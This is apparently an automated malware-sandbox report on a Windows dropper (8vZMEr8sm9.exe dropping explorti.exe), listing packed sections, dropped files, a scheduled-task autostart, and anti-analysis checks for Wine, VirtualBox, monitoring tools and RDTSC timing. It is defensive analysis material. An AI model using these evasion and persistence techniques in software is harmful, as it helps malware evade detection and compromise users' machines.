Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 15.2.explorti.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 19.2.explorti.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 21.2.explorti.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 23.2.explorti.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.11.dr Static PE information: real checksum: 0x0 should be: 0x26f7b6
Source: explorti.exe.4.dr Static PE information: real checksum: 0x1e5a34 should be: 0x1dc542
Source: 8vZMEr8sm9.exe Static PE information: real checksum: 0x1e5a34 should be: 0x1dc542
PE file contains sections with non-standard names
Source: 8vZMEr8sm9.exe Static PE information: section name:
Source: 8vZMEr8sm9.exe Static PE information: section name: .idata
Source: 8vZMEr8sm9.exe Static PE information: section name:
Source: 8vZMEr8sm9.exe Static PE information: section name: xdymjpys
Source: 8vZMEr8sm9.exe Static PE information: section name: poxsfwvj
Source: 8vZMEr8sm9.exe Static PE information: section name: .taggant
Source: explorti.exe.4.dr Static PE information: section name:
Source: explorti.exe.4.dr Static PE information: section name: .idata
Source: explorti.exe.4.dr Static PE information: section name:
Source: explorti.exe.4.dr Static PE information: section name: xdymjpys
Source: explorti.exe.4.dr Static PE information: section name: poxsfwvj
Source: explorti.exe.4.dr Static PE information: section name: .taggant
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_0017D82C push ecx; ret 11_2_0017D83F
Source: 8vZMEr8sm9.exe Static PE information: section name: entropy: 7.985398137161333
Source: 8vZMEr8sm9.exe Static PE information: section name: xdymjpys entropy: 7.954592729390372
Source: explorti.exe.4.dr Static PE information: section name: entropy: 7.985398137161333
Source: explorti.exe.4.dr Static PE information: section name: xdymjpys entropy: 7.954592729390372
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.995256620102285
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.979597916994264
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.951278738489968
Drops PE files
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DAD8E second address: 2DADA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DADA8 second address: 2DADBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F9B30829926h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DADBA second address: 2DADC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DADC0 second address: 2DADC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DADC4 second address: 2DADD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DADD0 second address: 2DADE8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9B3082992Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2D9F21 second address: 2D9F31 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9B30E293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DA045 second address: 2DA05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9B3082992Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F9B30829926h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DA05D second address: 2DA06B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F9B30E293B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DA06B second address: 2DA075 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9B30829926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DA075 second address: 2DA0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F9B30E293C5h 0x0000000e jnl 00007F9B30E293B6h 0x00000014 pushad 0x00000015 popad 0x00000016 je 00007F9B30E293B6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DA0A6 second address: 2DA0AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DA0AA second address: 2DA0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F9B30E293B6h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DA0C4 second address: 2DA0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DA252 second address: 2DA25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9B30E293B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DC7B0 second address: 2DC7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DC855 second address: 2DC8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9B30E293C1h 0x00000009 popad 0x0000000a popad 0x0000000b add dword ptr [esp], 06A788DEh 0x00000012 mov edx, 5CDF60E4h 0x00000017 lea ebx, dword ptr [ebp+1246165Bh] 0x0000001d jmp 00007F9B30E293C4h 0x00000022 jmp 00007F9B30E293C5h 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d jbe 00007F9B30E293B6h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DC964 second address: 2DC969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DCAAB second address: 2DCADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9B30E293BBh 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add dx, F58Dh 0x00000013 push 00000000h 0x00000015 add cx, ED87h 0x0000001a push 49E650AAh 0x0000001f jns 00007F9B30E293C4h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2DCADA second address: 2DCADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC165 second address: 2FC16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC16B second address: 2FC17F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F9B30829926h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC2BD second address: 2FC2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC2C3 second address: 2FC2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC2CC second address: 2FC2F0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9B30E293CFh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC57C second address: 2FC58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 jo 00007F9B30829969h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC58C second address: 2FC590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC590 second address: 2FC5B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829934h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F9B30829941h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC9A8 second address: 2FC9D0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9B30E293B6h 0x00000008 jno 00007F9B30E293B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jmp 00007F9B30E293C5h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FC9D0 second address: 2FC9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FD1CD second address: 2FD1D7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9B30E293C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FD1D7 second address: 2FD1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FD995 second address: 2FD9B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F9B30E293BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F9B30E293B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FD9B3 second address: 2FD9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2FD9B9 second address: 2FD9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 300270 second address: 300274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 304832 second address: 30483C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30483C second address: 304840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 303D4D second address: 303D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 303D52 second address: 303D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9B30829936h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 303D8A second address: 303D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 304EAD second address: 304EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 304EB3 second address: 304ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9B30E293BCh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jc 00007F9B30E293C0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 304ED6 second address: 304EE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 304EE3 second address: 304F02 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F9B30E293BEh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3097C6 second address: 3097CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3097CC second address: 3097D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3097D2 second address: 3097F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9B30829936h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3097F5 second address: 3097FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3097FB second address: 309800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 308BF9 second address: 308C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 308D7C second address: 308DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F9B3082992Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F9B30829926h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F9B3082993Ah 0x0000001c jmp 00007F9B30829934h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3094E8 second address: 3094EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3094EC second address: 3094F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30AE93 second address: 30AE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
